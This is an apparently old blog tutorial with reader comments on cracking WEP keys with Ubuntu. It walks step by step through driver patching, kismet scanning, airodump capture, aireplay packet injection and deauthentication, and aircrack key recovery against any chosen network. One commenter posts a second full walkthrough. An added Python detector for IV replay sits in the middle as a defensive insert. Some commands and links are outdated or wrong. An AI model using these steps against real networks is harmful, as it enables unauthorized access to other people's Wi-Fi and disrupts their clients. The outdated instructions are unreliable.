How to crack a WEP key using Ubuntu
After the article on cracking a WEP key using a MAC, many users have requested similar *testing* of their security procedures using a popular Linux distro and WinXP. This article delves into cracking a WEP key and a WEP key force using the most popular and user-friendly Linux distro out there: Ubuntu. All you need is a laptop with a wireless card and a copy of Ubuntu Linux. NOTE: Most of the Intel wireless adapters that come built into most laptops these days should work.
Ubuntu (IPA pronunciation: /u’buntu/) is a Linux distribution offering an operating system predominantly targeted at desktop computers. Based on Debian GNU/Linux, Ubuntu concentrates on usability, freedom from restriction of use, regular releases, and ease of installation. Ubuntu is sponsored by Canonical Ltd., by South African Mark Shuttleworth; the name of the distribution comes from the African concept of ubuntu (roughly, “humanity towards others”).
First step, obviously, is to install Ubuntu. Just boot from the CD and follow the directions. If you have problems or need help installing UBUNTU, follow this guide straight from Ubuntu. Once you have the OS installed and configured/customized to your liking we can proceed with the first step. I’d suggest performing the following steps in order, otherwise you may have problems.
Next, install the extra repositories and all the programs that Ubuntu doesn’t preinstall. Make sure your machine is able to establish a connection to the Internet. If you can only connect via wireless and are having problems, there is a package called Wi-Fi radar that is helpful. To install the extra repositories, open a terminal window and type the following:
sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list
While in the editor, replace everything with:
## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
## MAJOR BUG FIX UPDATES produced after the final release
deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free
Save the file and exit the text editor. Next type the command:
sudo apt-get update
Now we have to install the packages we’ll need later on:
sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils
Next, you should update your entire system by going to the System Menu>Administration>Update Manager. Click ‘Check’ and begin installing updates. Then reboot your system. After this is done, it’s time to patch the Madwifi drivers.
This is where everything can be tricky. My wireless card (Linksys WPC55AG) uses the Atheros driver, which I needed to patch. If you have a different driver, you’re going to need to find out whether or not you need to patch your drivers, or if they’ll even work with the Aircrack suite. The forums at aircrack-ng.org are a good place to look and so is a Google search. If you have an Atheros card, it will be called ath0 when you type iwconfig in the terminal window, or there will be a line that says Ethernet controller: Atheros Communications… when you type lspci in the terminal.
Let’s apply the madwifi patch, which you’ll need if you’re using the Atheros driver. This will temporarily disable your wireless card when it deletes the old drivers off the disk. First we’re going to navigate to the /usr/src directory, download the new drivers, delete the old drivers, then install the new ones and apply the patch. You can just copy and paste the commands below into the terminal or type them yourself. So, first, let’s get the patch and then get the corresponding version of the driver:
sudo -i
cd /usr/src
wget http://patches.aircrack-ng.org/madwifi-ng-r1679.patch
wget http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r1679-20060707.tar.gz
ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name 'ath*' -exec rm -v {} \;
find /lib/modules -name 'wlan*' -exec rm -v {} \;
tar zxvf madwifi-ng-r1679-20060707.tar.gz
cd madwifi-ng-r1679-20060707/
patch -Np1 -i ../madwifi-ng-r1679.patch
make
make install
modprobe ath_pci
NOTE: Some people have been having problems with the modprobe command. A comment below contains a fix in some cases:
However, during Madwifi Installation I got this warning:
Warning: could not find /usr/src/madwifi/ath_hal/.hal.o.cmd for /usr/src/madwifi/ath_hal/hal.o
This warning can be IGNORED.
When I ran “modprobe ath_pci” it gave me an error message and “dmesg” gave me some gibberish about “disagrees about version of symbol”.
I browsed the web and found the solution: You have to delete the linux-restricted modules. Just search for “linux-restricted” in Synaptic. I removed everything but “linux-restricted-modules-common”. Then I compiled the madwifi again and ran “modprobe ath_pci” again. NO ERROR this time! Authenticating and injecting works!
Apparently some network cards with atheros chipset cause problems if you don’t remove the linux-restricted-modules.
If you are using the Atheros driver, next we need to configure kismet to use the right source. If you are using another driver you’ll have to look up what syntax you use. First navigate to the Kismet config, then change the source line.
sudo gedit /etc/kismet/kismet.conf
Change the line that begins with 'source=' to 'source=madwifi_ag,ath0,madwifi'. Now reboot the computer. After it boots back up you should be able to access the internet again via your wireless card.
Now we can begin cracking. Open up a terminal window, enter monitor mode, and run kismet.
sudo airmon start ath0
sudo kismet
Locate the wireless network you want to crack, and note its ESSID and channel. Then exit by pressing Ctrl-C.
Next, run airodump.
sudo airodump ath0 filename channel# 1
The one at the end lets Airodump know we only want to capture IV’s. The filename can be anything you want, and will be saved in your home directory (or whatever directory you run the command from) as filename.ivs.
Copy the bssid of the wireless network from the airodump window by selecting it and pressing Shift+Ctrl+C. Open up a new terminal window so we can run aireplay to start injecting packets so our data count goes up. We want the data column in airodump to reach between 100,000 and 400,000. The more packets we have, the faster aircrack can find the WEP key. If the WEP key is 128 bits, we may need up to 1,000,000 packets.
sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0
This should associate the network with the wireless connection. If it times out repeatedly, you need to be closer to the wireless router or change your interface rate by typing 'sudo iwconfig ath0 rate 1M'.
Next we want to start injecting packets.
sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0
At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C and run the command again. You can try to speed things up by entering this command:
sudo aireplay -0 ath0 -a BSSID ath0
Otherwise just sit back and wait. As soon as packets begin to be sent, the data field in Airodump should start flying. Wait until the desired number of packets have been received, then open a new terminal window and run aircrack.
sudo aircrack filename.ivs
After a minute, aircrack should return the WEP key. If it doesn’t, collect more packets.
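Seen from the monitoring side, the injection step above stands out: a replayed ARP request goes out again and again with the same WEP IV, while a normal client changes the IV from frame to frame. The following is an added example, not part of the original article, that flags this pattern in a capture summary; the record layout, the threshold and the sample frames are constructed for illustration, and the injector MAC is the placeholder address used in the commands above.

```python
from collections import defaultdict, deque


def find_iv_replay(frames, window=1.0, threshold=20):
    """Return {(transmitter, iv): peak_count} for every transmitter that sent
    the same WEP IV at least `threshold` times within `window` seconds.

    `frames` is an iterable of (timestamp_s, transmitter_mac, iv) tuples.
    The threshold is an assumption; it only has to sit well above the
    handful of repeats that ordinary link-layer retries produce.
    """
    recent = defaultdict(deque)  # (mac, iv) -> timestamps still inside the window
    peaks = {}
    for ts, mac, iv in sorted(frames):
        q = recent[(mac, iv)]
        q.append(ts)
        while ts - q[0] > window:  # drop sightings older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[(mac, iv)] = max(peaks.get((mac, iv), 0), len(q))
    return peaks


def sample_frames():
    """Constructed capture summary: (time in s, transmitter MAC, 24-bit IV)."""
    frames = []
    # Normal client: a fresh IV per frame, 50 frames/s for two seconds.
    for i in range(100):
        frames.append((i * 0.02, "00:aa:bb:cc:dd:01", 0x1000 + i))
    # One link-layer retry, which legitimately repeats an IV once.
    frames.append((0.021, "00:aa:bb:cc:dd:01", 0x1001))
    # Replay: one captured frame re-sent unchanged 300 times within a second.
    for i in range(300):
        frames.append((0.5 + i / 300.0, "00:01:02:03:04:05", 0xABCDEF))
    return frames


def report(peaks):
    """Format one alert line per flagged (transmitter, IV) pair."""
    return [f"{mac} repeated IV {iv:06x} {n} times within the window"
            for (mac, iv), n in sorted(peaks.items())]


if __name__ == "__main__":
    for line in report(find_iv_replay(sample_frames())):
        print(line)
```
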
The links to the madwifi patch are broken.
Hi John. Thanks for bringing it to our notice. The link to MadWifi has been updated. All other links on this post have been verified too.
these instructions are wrong
tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install
the tar command is obviously wrong.. you updated the file link remember?
and the patch command don’t work as well.
Damm.. Thanks Jim. I have updated the tar instructions. Please note that I have also changed the link for the madwifi as well as the patch. The tar instructions and the wget command should work properly now.
problem finding and loading http://packages.freecontrib.org/ubuntu/plf
in
"## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free"
this link to http://packages.freecontrib.org/ubuntu/plf is down, any chance of putting it back up
I have ipw3945. How can I patch it to inject?
Does anyone test it?
get http://patches.aircrack-ng.org/madwifi-ng-r1679.patch
not working could some 1 plz reup/relink?
to 10: # OOzy ipw3945 injecting works with wifislax / wifiway without patching.
6: jim # try this ubuntu tuto http://en.airdump.net/hacks/hacking-wifi-ultimate-ubuntu-guide/
or packet injection windows tuto http://en.airdump.net/hacks/packet-injection-windows/
hey look, i had some problems after running:
ifconfig ath0 down
and
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
i got this:
root@linux:/usr/src# ifconfig ath0 down
ath0: ERROR while getting interface flags: No such device
root@linux:/usr/src# rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
ERROR: Module ath_rate_sample does not exist in /proc/modules
ERROR: Module wlan_wep does not exist in /proc/modules
ERROR: Module ath_rate_onoe does not exist in /proc/modules
could u help me out ? thanks
Thanks for your guide.
Have you ever tried to install aircrack on macbook 2,0 ghz with ubuntu for amd64? Does it work?
hi i have this problem my wireless card uses atmel drivers i don’t know how to patch it
I have tried using this guide with Ubuntu 7.04 and a Ubiquiti SRC 300mW (Atheros based) pc card. I’ve had spotty luck getting aircrack and kismet to work consistently. Your tutorial never says which version of Ubuntu you are using. I am suspicious the included drivers are not the best source — but I have not had any luck on uninstalling the restricted modules and installing new drivers with a patch. Any ideas would be appreciated…
Out of date.
BUT please make new one.
It looks as the best for atheros drivers.
THANK YOU, I WOULD APPRECIATE IT!!!!!
Any chance of this getting updated for 7.10? This looks like the best guide I’ve found so far.
Thanks!
when I type this
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
I have this:
ERROR: Module wlan_wep does not exist in /proc/modules
ERROR: Module ath_rate_onoe does not exist in /proc/modules
ERROR: Module ath_pci does not exist in /proc/modules
ERROR: Module wlan is in use by wlan_scan_sta
Am I doing something wrong?
it would be great if u can update this howto for 7.10 gutsy. thx!
i get this when i type in
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
i get this
ERROR: Module ath_rate_sample is in use
ERROR: Module wlan_wep does not exist in /proc/modules
ERROR: Module ath_rate_onoe does not exist in /proc/modules
ERROR: Removing ‘ath_pci’: Operation not permitted
ERROR: Module wlan is in use by wlan_scan_sta,ath_rate_sample,ath_pci
ERROR: Module ath_hal is in use by ath_rate_sample,ath_pci
———————————–
and when i type this in
cd madwifi-ng-r1679-20060707/
i get this
bash: cd: madwifi-ng-r1679-20060707/: No such file or directory
—————————————-
and this type this in
patch -Np1 -i ../madwifi-ng-r1679.patch
i get this
patch: **** Can’t open patch file ../madwifi-ng-r1679.patch : No such file or directory
————————————
and there are a lot of stuff that will not work like
sudo airodump ath0 filename channel# 1
it say command not found. please help me out.
well i need help getting internet on my psp….any help?????
sure i use “?” to purchase my dinner… you seem to have so many question marks that you don’t need.
So many in fact that you feel it’s ok to dump a truck load of them after every inane question you spout of your mouth.
please spend your remaining time on this planet doing nothing else but refreshing this page in the hope that you will gain a glimpse of my promised response.
lol
im using SENAO USB antenna with atheros chip. ndiswrapper is working fine with the atheros driver..shud i switch to madwifi?
hello everybody, i am new to ubuntu and to linux and i am no expert in computers either. i dont want everyone to do all the homework for me but i need HELP!
i read this article but i get stuck in many things, like what is “sudo” , how do i “open a terminal” , how is that “terminal” executed, how do i know which type is my antenna etc etc.
can anyone indicate me a place where i can get familiar with all this new things to me? thanks a lot.
another thing, since i am already in this page for real interest. couldnt there be a simpler way of cracking a WEP key? like one application or program (or whatever the name is) with inside ALL these things, so that with one simple click one gets it, the program doing all this stuff for me?
thanks a lot again, i will be grateful to any help.
yes there is a program or rather OS called backtrack which has all these programs installed. I personally use Ubuntu as my linux OS distro. now if you have Ubuntu what you have to do is open a terminal (shell) and type: sudo -i, what this does is make it so all your commands run on root (enter your password for your login when it asks for it after typing sudo -i
next type:
apt-get install aircrack-ng
what this does is install the aircrack suite (includes airmon-ng, airodump-ng, aircrack-ng, aireplay-ng, airtun-ng, and not sure what else).
after that is done installing type: airmon-ng
this shows all the wireless interface cards you have connected to your computer
pick one you want to use and type : airmon-ng start *your chosen interface* –mine is eth2
next type: airodump-ng *your chosen interface*
this will start scanning your surroundings for a network to crack. It will include all the info like the bssid, essid, channel, how many packets, how close you are to the access point.
chose an access point that has alot of packets coming in (and make sure it is WEP)
open a new terminal by pressing: ctrl+shift+N
type: airodump-ng -w *any file name you want* –bssid *the MAC address of the network your going to hack* -c *the channel of that network* *and your chosen interface*
example: airodump-ng -w passcode –bssid 00:11:22:33:44:55 -c 9 eth2
with any luck it will start collecting packets and save it in a file called passcode (or whatever you put) .cap
after it has collected at least 5000 packets open a new terminal
and type in: dir
this shows what is in the folder… your looking for yourfilenameyouchose-01.cap
highlight and copy this by double clicking it in the terminal and right-clicking
next type: aircrack-ng -a 1 -b *mac address your cracking* yourfilenameyouchose-01.cap
example: aircrack-ng -a 1 -b 00:11:22:33:44:55 passcode-01.cap
hit enter and if you have enough packets it should say key found… take that key and try connecting to the access point you cracked… when it asks for the key just type that key you just got into the the text box… if you followed this it should work for you on ubuntu… you can email me at vampyyri1123@hotmail.com if you have any questions
do you plan on making a hardy version of this tutorial anytime soon? or does anybody know of a link to a really good, easy one that a linux beginner like me could try?
dexter. You need way more knowledge than you have to even get started with this tutorial.
And about an all in one program, you’re thinking like a windoze user. The all in one program mentality is very limiting. These are individual tools that are simple yet effective.
But you’re going to have to know how to use the terminal and get familiar with linux before you even start this, or you will waste a lot of time.
Blindisde – thank you very much, i see more clearly now what you say. it’s true, linux and windows have different ways of thinking. i have to get more familiar with the linux environment and way of working. thanks a lot lets hope i manage!
this guide is so good – but it needs to be updated.
this is out of date “http://patches.aircrack-ng.org/madwifi-ng-r1679.patch”
and should be replaced with :”http://patches.aircrack-ng.org/madwifi-ng-r3745.patch”
Also i think that “get” is wrong and should be “wget”
but i only started using linux yesterday – so i dont know
http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r1679-20060707.tar.gz
should be this one instead:
http://snapshots.madwifi.org/madwifi-trunk/madwifi-trunk-r3867-20080924.tar.gz
ooops, I am sorry, I do not know why it submitted my post twice, it was by mistake
Can’t compile all the packages…
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
that link is still down. Any suggestions?
I tried these commands in my eee pc with its atheros card.
1. The links are dead. You can not download anything
2. I found the files from other sites.
3. My wireless card is not working any more.
Can anyone give advice on how to make it all work again?
Thank you.
“02:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN Network Connection (rev 61)”
i believe this to be my wireless driver, I went to http://www-307.ibm.com/pc/support/site.wss/MIGR-62875.html and downloaded the driver like the steps said to above. Now in this step of the process
“Change the line that begins with ’source=’ to ’source=madwifi_ag,ath0,madwifi’. Now reboot the computer. After it boots back up you should be able to access the internet again via your wireless card.”
what exactly do I type into terminal?
thanks good tutorial but a bit out of date
It requires so much effort…ehhh… Can somebody tell me how to install Aircrack in Ubuntu. I have it on my desktop but when I do sudo apt-get install aircrack I’m getting packet not found… I’m only new to Linux so if somebody can explain that to me in an easy way I would be very grateful
cheers.B
yes type in sudo apt-get install aircrack-ng
this should get it
sudo is to run things pretty much as a administrator
“eh ” ? lol. what is that ?
If you really want to show how lazy you are, you would have learnt about tab completion in the terminal.
you’re pathetic…
hey people i need urgent help with ipw2100 3b driver. i couldnt find any patch for that, can someone help me, im also new to linux
thanks
Hi thanks for this tutorial..its an excellent tutorial but unfortunately i have some problem..and i couldn’t get the WEP key..here is my ethernet controller details..does it support aircrack-ng
05:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8039 PCI-E Fast Ethernet Controller (rev 14)
07:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02)
err you guys…
for the people having trouble with anything to do with ‘ath’ related commands is probably cus you dont have an atheros wireless card…. pneumetic… and stuff… srsly you guise :S
You’re english is horrible.
So is yours
ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run ‘airmon-ng start eth1 ‘
Sysfs injection support was not found either.
THIS IS WHAT I GET WHEN I DO THE AIRODUMP-NG
PLEASE HELP
AND THE LINK IS THE DOWN TO THE PATCH
what card do you have? cuz i have both a wusb54gc linksys and a wpc11v3 linksys and when i run vmware player in windows for backtrack 3 it works but when i boot ubuntu it only lets me use the actual wifi network card
i got the same thing when i tried to start my wifi usb so i use my external network card
Sorry for the off-topic, but could you tell me where I can get a blog template as nice as this one?
Do you think this will work for me? I know my WEP password and can’t connect with ubuntu! Ubuntu wireless configuration tools are useless IMHO. I enter a passphrase and the dialog comes back asking for it, with a different passphrase entered… junk!
No if you have to ask then it will never work for you.
I tried to install this in Ubuntu 9.10 and some things installed some didn’t and I have aircrack installed in Ubuntu 9.10 but can’t find it or any other tools that went with it I put the file we edited back to normal since it never worked it would be nice if a person could make a package that worked with ubuntu 91.0 so when he goes out to diag, a network and people forgot the password of the network and don’t remember the admin password and have too many computers to reconfigure if they did a reset..
DAATE?????
Clearly you’re retarded, stop dribbling on the keyboard.